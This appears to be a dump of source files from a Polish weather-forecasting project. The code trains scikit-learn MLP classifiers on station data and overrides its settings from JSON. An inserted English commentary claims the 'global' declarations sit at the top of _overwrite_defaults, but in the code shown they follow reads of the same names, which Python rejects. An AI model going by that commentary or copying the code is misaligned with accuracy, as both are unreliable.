# WIND TOLERANCE\n if wind_tolerance_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(wind_tolerance_key))\n if type(json_data[wind_tolerance_key]) in (int, float):\n L.info(\"WIND_TOLERANCE = {} -> {}\".format(\n WIND_TOLERANCE,\n json_data[wind_tolerance_key]\n ))\n global WIND_TOLERANCE\n WIND_TOLERANCE = json_data[wind_tolerance_key]\n\n # PRECIPITATION TOLERANCE\n if precipitation_tolerance_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(precipitation_tolerance_key))\n if 
type(json_data[precipitation_tolerance_key]) in (int, float):\n L.info(\"PRECIPITATION_TOLERANCE = {} -> {}\".format(\n PRECIPITATION_TOLERANCE,\n json_data[precipitation_tolerance_key]\n ))\n global PRECIPITATION_TOLERANCE\n PRECIPITATION_TOLERANCE = json_data[precipitation_tolerance_key]\n\n # HIDDEN LAYER FACTORS\n if hidden_layer_factors_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(hidden_layer_factors_key))\n if isinstance(json_data[hidden_layer_factors_key], list):\n ok_type = True\n for hlf in json_data[hidden_layer_factors_key]:\n if not isinstance(hlf, list) or not all(type(f) in (float, int) for f in hlf):\n ok_type = False\n break\n L.info(\"HIDDEN_LAYER_FACTORS = {} -> {}\".format(\n HIDDEN_LAYER_FACTORS,\n json_data[hidden_layer_factors_key]\n ))\n if ok_type:\n global HIDDEN_LAYER_FACTORS\n HIDDEN_LAYER_FACTORS = json_data[hidden_layer_factors_key]\n\n # MAX ITER\n if max_iter_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(max_iter_key))\n if isinstance(json_data[max_iter_key], int):\n L.info(\"MAX_ITER = {} -> {}\".format(MAX_ITER, json_data[max_iter_key]))\n global MAX_ITER\n MAX_ITER = json_data[max_iter_key]\n\n # RES SCALE\n if res_scale_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(res_scale_key))\n if type(json_data[res_scale_key]) in (int, float):\n L.info(\"RES_SCALE = {} -> {}\".format(RES_SCALE, json_data[res_scale_key]))\n global RES_SCALE\n RES_SCALE = json_data[res_scale_key]\n\n # N REPS\n if n_reps_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(n_reps_key))\n if isinstance(json_data[n_reps_key], int):\n L.info(\"N_REPS = {} -> {}\".format(N_REPS, json_data[n_reps_key]))\n global N_REPS\n N_REPS = json_data[n_reps_key]\n\n # ACTIVATIONS\n if activations_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(activations_key))\n if isinstance(json_data[activations_key], list):\n if not all(a in ALL_ACTIVATIONS for a in json_data[activations_key]):\n raise ValueError(\"wartości {} powinny być ze zbioru {}\".format(\n json_data[activations_key], ALL_ACTIVATIONS))\n L.info(\"ACTIVATIONS = {} -> {}\".format(ACTIVATIONS, json_data[activations_key]))\n global ACTIVATIONS\n ACTIVATIONS = json_data[activations_key]\n\n # SOLVERS\n if solvers_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(solvers_key))\n if isinstance(json_data[solvers_key], list):\n if not all(a in ALL_SOLVERS for a in json_data[solvers_key]):\n raise ValueError(\"wartości {} powinny być ze zbioru {}\".format(\n json_data[solvers_key], ALL_SOLVERS))\n L.info(\"SOLVERS = {} -> {}\".format(SOLVERS, json_data[solvers_key]))\n global SOLVERS\n SOLVERS = json_data[solvers_key]\n\n\ndef process(\n data_type: str,\n data_dir: str,\n cfg_json: str,\n output_dir: str = dfs.OUTPUT_DIR,\n logs_dir: str = dfs.LOGS_DIR,\n range_days: int = dfs.RANGE_DAYS,\n interval: int = dfs.INTERVAL,\n train_sets: int = dfs.TRAIN_SETS,\n train_days: int = dfs.TRAIN_DAYS,\n test_sets: int = dfs.TEST_SETS,\n horizons: typing.Iterable[int] = dfs.HORIZONS,\n):\n \"\"\"Funkcja wykonująca kolejne etapy uczenia, testowania i prognozowania.\n\n Args:\n data_type: rodzaj danych (LOOP2 lub IMGW)\n data_dir: ścieżka do katalogu z danymi (odpowiednio loop2 lub imgw)\n cfg_json: json zawierający nadpisane domyślne wartości takie jak TEMPERATURE_TOLERANCE, czy N_REPS\n output_dir: katalog na rezultaty uczenia w formacie CSV\n logs_dir: katalog na logi\n range_days: liczba dni, z których będą robione dane do uczenia i testowania\n interval: interwał, do którego 
agregowane są dane\n train_sets: liczba zbiorów uczących\n train_days: liczba dni wejściowych\n test_sets: liczba zbiorów testowych\n horizons: lista horyzontów prognozy (w godzinach)\n \"\"\"\n\n if cfg_json is not None:\n _overwrite_defaults(cfg_json)\n\n _add_file_handler(logs_dir)\n\n _check_data_type(data_type)\n\n L.info(\"uruchomienie dvik-forecast dla daty {}\".format(dfs.UTC_NOW))\n\n start_dt, end_dt = dapi.get_range_dts(data_dir, range_days, interval)\n dts = dapi.get_dts(start_dt, end_dt, interval)\n _validate(data_dir, output_dir, dts, interval, train_sets, train_days, test_sets, horizons)\n\n proc_params = [\n \"data_type={}\".format(data_type),\n \"data_dir={}\".format(data_dir),\n \"output_dir={}\".format(output_dir),\n \"logs_dir={}\".format(logs_dir),\n \"range_days={}\".format(range_days),\n \"interval={}\".format(interval),\n \"train_sets={}\".format(train_sets),\n \"train_days={}\".format(train_days),\n \"test_sets={}\".format(test_sets),\n \"horizons={}\".format(horizons),\n \"start_dt={}\".format(start_dt),\n \"end_dt={}\".format(end_dt),\n ]\n L.info(\"parametry przetwarzania: {}\".format(', '.join(proc_params)))\n\n dt_sets = dapi.get_dt_sets(\n dts=dts,\n n_sets=train_sets + test_sets,\n set_intervals=train_days * (24 // interval),\n horizon_intervals=list(map(lambda f: f // interval, horizons))\n )\n\n l2_data = dapi.get_loop2_data(data_dir, start_dt, end_dt, interval)\n curr_full_utc_dt = max(l2_data)\n\n L.info('przygotowano zbiory dat do treningu')\n\n params = [\n ('avg_temp', 'temperatura', TEMPERATURE_TOLERANCE, TEMPERATURE_CODE),\n ('avg_press', 'ciśnienie', PRESSURE_TOLERANCE, PRESSURE_CODE),\n ('max_wind', 'wiatr', WIND_TOLERANCE, WIND_CODE),\n ('max_prec', 'opad atmosferyczny', PRECIPITATION_TOLERANCE, PRECIPITATION_CODE),\n ]\n\n forecasts = {} # param -> horizon_utc_dt -> (value, +-, param_name)\n\n for out_param, param_name, param_tol, param_code in params:\n forecasts[param_code] = {}\n\n param_learn_sets = lng.prepare_learning_sets(l2_data, dt_sets, out_param, RES_SCALE)\n L.info(\"przygotowano zbiory uczące dla parametru '{}'\".format(param_name))\n\n csv_file_path = os.path.join(\n output_dir,\n dfs.UTC_NOW.strftime('{}_learn_res_%y%m%d_%H%M.csv'.format(param_code))\n )\n\n ch_params = ', '.join([\n \"hidden_layer_factors = {}\".format(HIDDEN_LAYER_FACTORS),\n \"activations = {}\".format(ACTIVATIONS),\n \"solvers = {}\".format(SOLVERS),\n \"tolerance = {}\".format(TEMPERATURE_TOLERANCE),\n \"good_result = {}\".format(GOOD_RESULT),\n \"n_reps = {}\".format(N_REPS),\n \"res_scale = {}\".format(RES_SCALE),\n \"max_iter = {}\".format(MAX_ITER),\n \"early_stopping = {}\".format(EARLY_STOPPING),\n ])\n L.info(\"wybieranie klasyfikatora dla parametru '{}' dla konfiguracji: {}\".format(\n param_name, ch_params))\n clfs = lng.choose_classifiers(train_sets, test_sets, param_learn_sets,\n hidden_layer_factors=HIDDEN_LAYER_FACTORS,\n activations=ACTIVATIONS,\n solvers=SOLVERS,\n tolerance=param_tol,\n good_result=GOOD_RESULT,\n n_reps=N_REPS,\n res_scale=RES_SCALE,\n max_iter=MAX_ITER,\n early_stopping=EARLY_STOPPING,\n csv_file_path=csv_file_path)\n\n L.debug(\"najlepsze klasyfikatory dla parametru '{}':\".format(param_name))\n for i, h in enumerate(horizons):\n stats_txt = ', '.join([\n \"wynik = {}\".format(clfs[i][1]['result_score']),\n \"średnie odchylenie = {}\".format(clfs[i][1]['mean_diff']),\n \"mediana odchylenia = {}\".format(clfs[i][1]['med_diff']),\n \"maksymalne odchylenie = {}\".format(clfs[i][1]['max_diff']),\n \"niepewność standardowa = 
{}\".format(clfs[i][1]['sd_diff']),\n \"oczekiwane odchylenie standardowe = {}\".format(clfs[i][1]['expected_sd']),\n \"otrzymane odchylenie standardowe = {}\".format(clfs[i][1]['result_sd']),\n \"porównanie = {}\".format(clfs[i][2]),\n ])\n L.info(\"najlepszy klasyfikator dla parametru '{}' dla horyzontu {}: {}\".format(\n param_name, h, stats_txt))\n L.debug(\"klasyfikator = {}\".format(clfs[i][0]))\n\n pr_res = lng.predict(l2_data, clfs[i][0], train_days * (24 // interval)) / RES_SCALE\n\n horizon_utc_dt = curr_full_utc_dt + datetime.timedelta(hours=h)\n # L.debug(\"---------------------------------------------\")\n # L.info(\"wyznaczono parametr '{}' dla horyzontu {} ({}) = {}\".format(\n # param_name, h, horizon_utc_dt.strftime(\"%Y-%m-%d %H:%M UTC\"), pr_res))\n # L.debug(\"---------------------------------------------\")\n\n forecasts[param_code][horizon_utc_dt] = (pr_res, clfs[i][1]['sd_diff'], param_name)\n\n L.info(curr_full_utc_dt.strftime(\"prognoza z %Y-%m-%d %H:%M UTC\"))\n for param_code in forecasts:\n for utc_dt in sorted(forecasts[param_code]):\n val, sd, param_name = forecasts[param_code][utc_dt]\n min_val = round(val - sd, 1)\n max_val = round(val + sd, 1)\n if param_code in (WIND_CODE, PRECIPITATION_CODE):\n min_val = max(0, min_val)\n L.info(\"{} na {} UTC = {} <{}; {}>\".format(\n param_name, utc_dt.strftime(\"%Y-%m-%d %H:%M UTC\"), val, min_val, max_val))\n\n\ndef _check_data_type(data_type: str):\n \"\"\"Sprawdza, czy zadany typ danych jest wspierany.\n\n Args:\n data_type: typ danych\n\n Raises:\n NotImplementedError: jeśli zadany typ danych nie jest wspierany\n \"\"\"\n\n if data_type != dfs.LOOP2_DATA_TYPE:\n L.error('typ danych \"{}\" nie jest jeszcze wspierany'.format(data_type))\n raise NotImplementedError('typ danych {} nie jest jeszcze wspierany'.format(data_type))\n\n\ndef _add_file_handler(logs_dir: str):\n \"\"\"Dodaje uchwyt do pliku do loggera. 
Jeśli katalog na logi nie istnieje, to tworzy go.\n\n Args:\n logs_dir: katalog na logi\n \"\"\"\n\n logs_dir_created = False\n if not os.path.exists(logs_dir):\n os.makedirs(logs_dir)\n logs_dir_created = True\n\n log_file_path = os.path.join(logs_dir, dfs.LOG_FILE_NAME)\n dvl.add_file_handler(dfs.LOGGER_NAME, file_path=log_file_path)\n L.debug('logger={}: dodano uchwyt do pliku {}'.format(dfs.LOGGER_NAME, log_file_path))\n\n if logs_dir_created:\n L.info('utworzono katalog {}'.format(logs_dir))\n\n\ndef _validate(data_dir: str, output_dir: str, dts: typing.List[datetime.datetime], interval: int,\n train_sets: int, train_days: int, test_sets: int, horizons: typing.Iterable[int]):\n \"\"\"Waliduje dane.\n\n * data_dir musi istnieć.\n * Jeśli output_dir nie istnieje, to go tworzy.\n\n Args:\n data_dir:\n output_dir:\n dts:\n interval:\n train_sets:\n train_days:\n test_sets:\n horizons:\n\n Raises:\n IOError: jeśli data_dir nie istnieje\n ValueError: jeśli jest za mało dostępnych dat\n ArithmeticError: jeśli któryś z horyzontów prognozy nie jest podzielny przez interwał\n \"\"\"\n\n if not os.path.exists(data_dir):\n L.error('katalog {} nie istnieje'.format(data_dir))\n raise IOError('katalog {} nie istnieje'.format(data_dir))\n\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n L.info('utworzono katalog {}'.format(output_dir))\n\n # sprawdzam, czy liczba dostępnych dat jest wystarczająca\n set_size = train_days * 24 // interval + max(horizons) // interval\n required_n_dts = 2 * (train_sets + test_sets) + set_size\n required_n_days = required_n_dts // (24 // interval) + 1\n if len(dts) < required_n_dts:\n L.error('za mało dat: jest {}, potrzeba przynajmniej {} ({} dni)'.format(\n len(dts), required_n_dts, required_n_days))\n raise ValueError('za mało dat: jest {}, potrzeba przynajmniej {} ({} dni)'.format(\n len(dts), required_n_dts, required_n_days))\n\n if any(map(lambda f: f % interval > 0, horizons)):\n L.error('wszystkie horyzonty prognozy={} muszą być podzielne przez interwał={}'.format(\n horizons, interval))\n raise ArithmeticError('wszystkie horyzonty prognozy={} muszą być podzielne przez'\n ' interwał={}'.format(horizons, interval))\n"
},
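A note on `_overwrite_defaults` in `forecast.py` above: the module-level names must be declared `global` before their first read inside the function, otherwise CPython rejects the module at compile time, which is why the declaration sits at the top of the function body. A minimal, runnable reproduction of the pitfall:

    X = 1

    bad = "def f():\n    print(X)\n    global X\n"
    try:
        compile(bad, '<demo>', 'exec')
    except SyntaxError as e:
        print(e.msg)  # name 'X' is used prior to global declaration

    def fixed():
        global X  # declare first, then read and write freely
        print(X)
        X = 2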
{
"alpha_fraction": 0.568509578704834,
"alphanum_fraction": 0.5771284699440002,
"avg_line_length": 34.659671783447266,
"blob_id": "5ec2438c6c77909da1e67b863a1e637fd590ebde",
"content_id": "1f6515c677178a4c6f0a275ff9d8452e7ae2d5e2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 23977,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 667,
"path": "/dvik_forecast/learning.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "import warnings\n\nwarnings.filterwarnings('ignore')\n\nimport datetime\nimport typing\nimport random\nfrom sklearn import neural_network as snn\nimport csv\n\nfrom . import defaults as dfs\n\nimport dvik_logging as dvl\nimport dvik_print as dvp\n\nL = dvl.get_logger(dfs.LOGGER_NAME)\nPP = dvp.PrettyPrint(filename=__file__, show_line=True)\n\n# ([[v11, v12, ...], [v21, ...], ...], [c1, c2, ...])\nLEARNING_SET_TYPE = typing.Tuple[typing.List[typing.List[float]], typing.List[int]]\n\nACTIVATION_IDENTITY = 'identity'\nACTIVATION_LOGISTIC = 'logistic'\nACTIVATION_TANH = 'tanh'\nACTIVATION_RELU = 'relu'\n\nACTIVATIONS = (ACTIVATION_IDENTITY, ACTIVATION_LOGISTIC, ACTIVATION_TANH, ACTIVATION_RELU)\n\nSOLVER_LBFGS = 'lbfgs'\nSOLVER_SGD = 'sgd'\nSOLVER_ADAM = 'adam'\n\nSOLVERS = (SOLVER_LBFGS, SOLVER_SGD, SOLVER_ADAM)\n\nDEFAULT_RES_SCALE = 2\nDEFAULT_N_REPS = 5\nDEFAULT_MAX_ITER = 100000\nDEFAULT_EARLY_STOPPING = True\n\n\ndef prepare_learning_sets(data: typing.Dict[datetime.datetime, dict],\n dt_sets: typing.List[typing.Dict[str, typing.List[datetime.datetime]]],\n out_param: str, res_scale: float = DEFAULT_RES_SCALE\n ) -> typing.List[LEARNING_SET_TYPE]:\n \"\"\"Przygotowuje zbiory danych do uczenia. Będzie to N par (A, B), gdzie\n N - całkowita liczba zbiorów uczących i testowych,\n A - macierz, gdzie wiersz to interwał, a kolumna to parametr,\n B - lista wynikowych klas.\n\n Args:\n data: dane dla poszczególnych dat\n dt_sets: zbiory dat dla każdego zbioru uczącego i testowego\n out_param: nazwa parametru, który będzie klasą wyniku\n res_scale: skala klasy wynikowych, domyślnie DEFAULT_RES_SCALE\n\n Returns:\n lista par (A, B)\n \"\"\"\n\n L.info(\"przygotowywanie zbiorów do uczenia: res_scale = {}\".format(res_scale))\n\n learn_sets = []\n\n for dts in dt_sets:\n in_vals = _get_input_params(dts['in_dts'], data)\n out_vals = _get_output_params(dts['out_dts'], data, out_param, res_scale)\n learn_sets.append((in_vals, out_vals))\n\n return learn_sets\n\n\ndef _get_input_params(in_dts: typing.List[datetime.datetime], data: typing.Dict[datetime.datetime, dict]\n ) -> typing.List[typing.List[float]]:\n \"\"\"Zwraca macierz parametrów wejściowych.\n\n Args:\n in_dts: daty wejściowe danego zestawu\n data: dane dla poszczególnych interwałów\n\n Returns:\n macierz parametrów\n \"\"\"\n\n res = []\n for idt in in_dts:\n res.append(_get_data_row(idt, data[idt]))\n\n return res\n\n\ndef _normalize(val: float, min_val: float, max_val: float) -> int:\n \"\"\"Normalizuje wartość val względem min_val i max_val tak, żeby przyjęła ona wartość 0-100.\n\n Args:\n val: normalizowana wartość\n min_val: dolna granica\n max_val: górna granica\n\n Returns:\n znormalizowana wartość\n \"\"\"\n\n val = max(min_val, val)\n val = min(max_val, val)\n\n nv = (val - min_val) / (max_val - min_val)\n return int(round(100.0 * nv))\n\n\ndef _get_data_row(dt: datetime.datetime, dt_data: typing.Dict[str, float]) -> typing.List[float]:\n \"\"\"Zwraca wiersz macierzy parametrów wejściowych.\n\n Args:\n dt: data\n dt_data: dane dla daty\n\n Returns:\n wiersz z danymi\n \"\"\"\n\n hour = dt.hour\n days = (dt - datetime.datetime(year=dt.year, month=1, day=1)).days\n\n return [\n _normalize(dt_data['avg_temp'], -15, 35),\n _normalize(dt_data['max_wind'], 0, 10),\n _normalize(dt_data['avg_wind_dir'], 0, 360),\n _normalize(dt_data['avg_hum'], 0, 100),\n _normalize(dt_data['max_prec'], 0, 5),\n _normalize(dt_data['avg_press'], 990, 1010),\n _normalize(hour, 0, 23),\n _normalize(days, 1, 366),\n ]\n\n\ndef 
_get_output_params(out_dts: typing.List[datetime.datetime], data: typing.Dict[datetime.datetime, dict],\n out_param: str, res_scale: float) -> typing.List[int]:\n \"\"\"Zwraca listę klas wyjściowych.\n\n Args:\n out_dts: daty, dla których będą wyznaczone klasy wyjściowe\n data: dane dla poszczególnych dat\n out_param: klucz parametru, dla którego będą wyznaczane klasy\n res_scale: skala klas wynikowych\n\n Returns:\n lista klas\n \"\"\"\n\n return [int(round(res_scale * data[odt][out_param], 0)) for odt in out_dts]\n\n\ndef _flatten(matrix: typing.List[typing.List[float]]) -> typing.List[float]:\n \"\"\"Wypłaszcza macierz. Przyjmijmy, że\n A = [v1\n v2\n ...\n vn]\n W wyniku działania tej funkcji otrzymamy A' = [v1 v2 ... vn]\n\n Args:\n matrix: macierz do wypłaszczenia\n\n Returns:\n wektor\n \"\"\"\n\n fv = []\n for r in matrix:\n fv += r\n return fv\n\n\ndef _compare_vectors(v1: typing.List[float], v2: typing.List[float], left: int = 3, right: int = 3,\n conn: str = \" -> \") -> str:\n \"\"\"Zwraca porównanie dwóch wektorów w formie tekstowej.\n Wektory są sortowane według różnic pomiędzy poszczególnymi elementami.\n Następnie wybierane jest left elementów z lewej, right z prawej i formatowane są do\n postaci tekstowej, np.\n v1 = [1, 2, 3, 4, 5, 6, 7, 8, 9] -> \"[1, 2, 3, ..., 7, 8, 9]\"\n Jeśli wektor ma poniżej 8 elementów, to wypisywane są wszystkie (po 3 z każdej i 1 zamiast \"...\").\n\n Args:\n v1: pierwszy wektor\n v2: drugi wektor\n left: ilośc elementów z lewej (domyślnie 3)\n right: ilość elementów z prawej (domyślnie 3)\n conn: string łączący oba wektory (domyślnie \" -> \")\n\n Returns:\n sformatowane, połączone, posortowane wektory\n \"\"\"\n\n if len(v1) != len(v2):\n raise IndexError(\"v1 ma {} elementów niż v2\".format(\"więcej\" if len(v1) > len(v2) else \"mniej\"))\n\n v = zip(v1, v2)\n v = sorted(v, key=lambda vi: abs(vi[0] - vi[1]))\n\n if len(v) > left + right:\n v1_left = [vi[0] for vi in v[:left]]\n v1_right = [vi[0] for vi in v[-right:]]\n v2_left = [vi[1] for vi in v[:left]]\n v2_right = [vi[1] for vi in v[-right:]]\n v1_full = v1_left + ['...'] + v1_right\n v2_full = v2_left + ['...'] + v2_right\n else:\n v1_full = [vi[0] for vi in v]\n v2_full = [vi[1] for vi in v]\n\n return \"[{}]{}[{}]\".format(\n ', '.join(map(str, v1_full)),\n conn,\n ', '.join(map(str, v2_full)),\n )\n\n\ndef choose_classifiers(n_train_sets: int, n_test_sets: int, learn_sets: typing.List[LEARNING_SET_TYPE],\n hidden_layer_factors: typing.List[typing.List[float]], activations: typing.List[str],\n solvers: typing.List[str], tolerance: float, good_result: typing.Dict[str, float],\n n_reps: int = DEFAULT_N_REPS, res_scale: float = DEFAULT_RES_SCALE,\n max_iter: int = DEFAULT_MAX_ITER, early_stopping: bool = DEFAULT_EARLY_STOPPING,\n csv_file_path: str = None) -> typing.List[typing.Tuple[snn.MLPClassifier, dict, str]]:\n \"\"\"Funkcja wybierająca najlepsze klasyfikatory\n\n Args:\n n_train_sets: liczba zbiorów uczących\n n_test_sets: liczba zbiorów testujących\n learn_sets: zbiory uczące i testujące wyznaczone w ramach zakresu\n hidden_layer_factors: lista list z współczynnikami do obliczenia wymiarów warstw ukrytych\n activations: lista funkcji aktywacji\n solvers: lista funkcji do optymalizacji wag\n\n tolerance: tolerancja wyniku\n good_result: słownik z wartościami determinującymi dobry rezultat\n\n n_reps: liczba powtórzeń dla każdej kombinacji parametrów, domyślnie DEFAULT_N_REPS\n res_scale: skala klas wynikowych, domyślnie DEFAULT_RES_SCALE\n max_iter: maksymalna liczba iteracji 
uczenia\n early_stopping: czy zatrzymać uczenie, jeśli nie przynosi rezultatu (dla \"sgd\" i \"adam\")\n csv_file_path: ścieżka do pliku csv, jeśli None, to pomijane\n\n Returns:\n\n \"\"\"\n\n res = []\n\n csv_fields = ['hidden_layers', 'activation', 'solver',\n 'wynik', 'średnie odchylenie', 'mediana odchylenia', 'maksymalne odchylenie',\n 'niepewność standardowa', 'oczekiwane odchylenie standardowe',\n 'otrzymane odchylenie standardowe', 'porównanie']\n csv_rows = []\n\n random.shuffle(learn_sets)\n train_sets = learn_sets[:n_train_sets]\n test_sets = learn_sets[-n_test_sets:]\n\n train_in_matrix = []\n train_out_vectors = []\n input_size = None\n for in_ts, out_ts in train_sets:\n train_in_matrix.append(_flatten(in_ts))\n if input_size is None:\n input_size = len(train_in_matrix[0])\n\n if len(train_out_vectors) == 0:\n for i in range(len(out_ts)):\n train_out_vectors.append([])\n\n for i, ot in enumerate(out_ts):\n train_out_vectors[i].append(ot)\n\n test_in_matrix = []\n test_out_vectors = []\n for in_ts, out_ts in test_sets:\n fl_in_ts = []\n for it in in_ts:\n fl_in_ts += it\n test_in_matrix.append(fl_in_ts)\n\n if len(test_out_vectors) == 0:\n for i in range(len(out_ts)):\n test_out_vectors.append([])\n\n for i, ot in enumerate(out_ts):\n test_out_vectors[i].append(ot)\n\n hl_sizes = []\n for hlf in hidden_layer_factors:\n hl_sizes.append(tuple([int(f * input_size) for f in hlf]))\n params = [(hls, a, s)\n for hls in hl_sizes\n for a in activations\n for s in solvers]\n\n n_it, total_its = 0, len(train_out_vectors) * len(params)\n for i, tov in enumerate(train_out_vectors):\n L.info(\"szukam najlepszego klasyfikatora dla {}. prognozy\".format(i + 1))\n forecast_best = None\n for hls, a, s in params:\n L.info(\"postęp: {}%\".format(round(100 * n_it / total_its, 1)))\n n_it += 1\n best_result = None\n for _ in range(n_reps):\n clf = _get_classifier(hls, a, s, max_iter, early_stopping)\n L.debug(\"utworzona klasyfikator MLP: hidden_layers='{}', activation='{}', solver='{}'\".format(\n hls, a, s))\n real_exp, real_res, stats = _train_classifier(\n clf, train_in_matrix, tov, test_in_matrix, test_out_vectors[i], tolerance, res_scale)\n\n if best_result is None or _compare_stats(stats, best_result[1], tolerance):\n best_result = (clf, stats, _compare_vectors(real_exp, real_res))\n L.debug(\"best_result -> {}\".format([\n best_result[1]['result_score'],\n best_result[1]['mean_diff'],\n best_result[1]['med_diff'],\n best_result[1]['max_diff'],\n best_result[1]['sd_diff'],\n best_result[1]['expected_sd'],\n best_result[1]['result_sd'],\n _compare_vectors(real_exp, real_res),\n ]))\n\n if not _good_result_conditions(stats, good_result):\n continue\n L.debug(\"oczekiwano: {}\".format(real_exp))\n L.debug(\"otrzymano: {}\".format(real_res))\n L.debug(', '.join([\n \"wynik = {}\".format(stats['result_score']),\n \"średnie odchylenie = {}\".format(stats['mean_diff']),\n \"mediana odchylenia = {}\".format(stats['med_diff']),\n \"maksymalne odchylenie = {}\".format(stats['max_diff']),\n \"niepewność standardowa = {}\".format(stats['sd_diff']),\n \"oczekiwane odchylenie standardowe = {}\".format(stats['expected_sd']),\n \"otrzymane odchylenie standardowe = {}\".format(stats['result_sd']),\n \"porównanie = {}\".format(_compare_vectors(real_exp, real_res)),\n ]))\n\n params_txt = \"hidden_layers='{}', activation='{}', solver='{}'\".format(hls, a, s)\n stats_txt = ', '.join([\n \"wynik = {}\".format(best_result[1]['result_score']),\n \"średnie odchylenie = {}\".format(best_result[1]['mean_diff']),\n 
\"mediana odchylenia = {}\".format(best_result[1]['med_diff']),\n \"maksymalne odchylenie = {}\".format(best_result[1]['max_diff']),\n \"niepewność standardowa = {}\".format(best_result[1]['sd_diff']),\n \"oczekiwane odchylenie standardowe = {}\".format(best_result[1]['expected_sd']),\n \"otrzymane odchylenie standardowe = {}\".format(best_result[1]['result_sd']),\n \"porównanie = {}\".format(best_result[2]),\n ])\n L.info(\"najlepszy rezultat dla {}: {}\".format(params_txt, stats_txt))\n\n if forecast_best is None or _compare_stats(best_result[1], forecast_best[1], tolerance):\n L.info('uaktualniam forecast_best')\n if forecast_best is not None:\n L.info(\"było: {}\".format([\n forecast_best[1]['result_score'],\n forecast_best[1]['mean_diff'],\n forecast_best[1]['med_diff'],\n forecast_best[1]['max_diff'],\n forecast_best[1]['sd_diff'],\n forecast_best[1]['expected_sd'],\n forecast_best[1]['result_sd'],\n ]))\n forecast_best = best_result\n L.info(\"jest: {}\".format([\n forecast_best[1]['result_score'],\n forecast_best[1]['mean_diff'],\n forecast_best[1]['med_diff'],\n forecast_best[1]['max_diff'],\n forecast_best[1]['sd_diff'],\n forecast_best[1]['expected_sd'],\n forecast_best[1]['result_sd'],\n ]))\n\n # dodanie do csv\n if csv_file_path is not None:\n csv_rows.append({\n 'hidden_layers': hls,\n 'activation': a,\n 'solver': s,\n 'wynik': best_result[1]['result_score'],\n 'średnie odchylenie': best_result[1]['mean_diff'],\n 'mediana odchylenia': best_result[1]['med_diff'],\n 'maksymalne odchylenie': best_result[1]['max_diff'],\n 'niepewność standardowa': best_result[1]['sd_diff'],\n 'oczekiwane odchylenie standardowe': best_result[1]['expected_sd'],\n 'otrzymane odchylenie standardowe': best_result[1]['result_sd'],\n \"porównanie\": best_result[2],\n })\n\n stats_txt = ', '.join([\n \"wynik = {}\".format(forecast_best[1]['result_score']),\n \"średnie odchylenie = {}\".format(forecast_best[1]['mean_diff']),\n \"mediana odchylenia = {}\".format(forecast_best[1]['med_diff']),\n \"maksymalne odchylenie = {}\".format(forecast_best[1]['max_diff']),\n \"niepewność standardowa = {}\".format(forecast_best[1]['sd_diff']),\n \"oczekiwane odchylenie standardowe = {}\".format(forecast_best[1]['expected_sd']),\n \"otrzymane odchylenie standardowe = {}\".format(forecast_best[1]['result_sd']),\n \"porównanie = {}\".format(forecast_best[2]),\n ])\n L.info(\"najlepszy rezultat dla {}. prognozy: {}\".format(i + 1, stats_txt))\n\n res.append(forecast_best)\n\n if csv_file_path is not None:\n with open(csv_file_path, 'w') as fp:\n writer = csv.DictWriter(fp, fieldnames=csv_fields)\n writer.writeheader()\n for row in csv_rows:\n writer.writerow(row)\n L.info(\"wyniki uczenia zapisano do pliku {}\".format(csv_file_path))\n\n return res\n\n\ndef _compare_stats(a: typing.Dict[str, float], b: typing.Dict[str, float],\n tolerance: float) -> bool:\n \"\"\"Porównuje dwie statystyki. 
Zwraca prawdę, jeśli a jest lepsze od b.\n\n Args:\n a: statystyka a\n b: statystyka b\n tolerance: tolerancja wyniku\n\n Returns:\n prawda, jeśli a jest lepsze od b\n \"\"\"\n\n a_sd_diff = abs(a['expected_sd'] - a['result_sd'])\n\n return all([\n a_sd_diff < tolerance,\n a['max_diff'] < b['max_diff'],\n a['mean_diff'] < b['mean_diff'] or a['med_diff'] < b['med_diff'],\n ])\n\n\ndef _good_result_conditions(stats: typing.Dict[str, float], good_result: typing.Dict[str, float]\n ) -> bool:\n \"\"\"Sprawdza, czy są spełnione warunki \"dobrego rozwiązania\".\n\n Args:\n stats: słownik z miarami statystycznymi rozwiązania\n good_result: słownik z wartościami określającymi dobry rezultat\n\n Returns:\n prawda, jeśli są, fałsz, jeśli nie\n \"\"\"\n\n return all([\n stats['result_score'] >= good_result['min_result_score'],\n stats['max_diff'] <= good_result['max_max_diff'],\n stats['mean_diff'] <= good_result['max_mean_diff'],\n stats['med_diff'] <= good_result['max_med_diff'],\n abs(stats['expected_sd'] - stats['result_sd']) <= good_result['max_sd_diff'],\n ])\n\n\ndef _get_classifier(hidden_layers: typing.Tuple[int], activation: str, solver: str,\n max_iter: int, early_stopping: bool) -> snn.MLPClassifier:\n \"\"\"Zwraca klasyfikator MLP o podanych warstwach ukrytych, funkcji aktywacji i\n\n Args:\n hidden_layers: wymiary warst ukrytych\n activation: funkcja aktywacji warstw ukrytych\n solver: metoda optymalizacji wag\n max_iter: maksymalna liczba iteracji uczenia\n early_stopping: czy zatrzymać uczenie, jeśli nie przynosi rezultatu (dla \"sgd\" i \"adam\")\n\n Returns:\n obiekt klasyfikatora\n \"\"\"\n\n if activation not in ACTIVATIONS:\n msg = \"activation='{}', powinno być ze zbioru {}\".format(activation, ACTIVATIONS)\n L.error(msg)\n raise ValueError(msg)\n\n if solver not in SOLVERS:\n msg = \"solver='{}', powinno być ze zbioru {}\".format(solver, SOLVERS)\n L.error(msg)\n raise ValueError(msg)\n\n return snn.MLPClassifier(hidden_layer_sizes=hidden_layers, activation=activation, solver=solver,\n max_iter=max_iter, early_stopping=early_stopping)\n\n\ndef _train_classifier(clf: snn.MLPClassifier,\n train_in: typing.List[typing.List[float]], train_out: typing.List[int],\n test_in: typing.List[typing.List[float]], test_out: typing.List[int],\n tolerance: float, res_scale: float\n ) -> typing.Tuple[list, list, typing.Dict[str, float]]:\n \"\"\"Trenuje i testuje klasyfikator. 
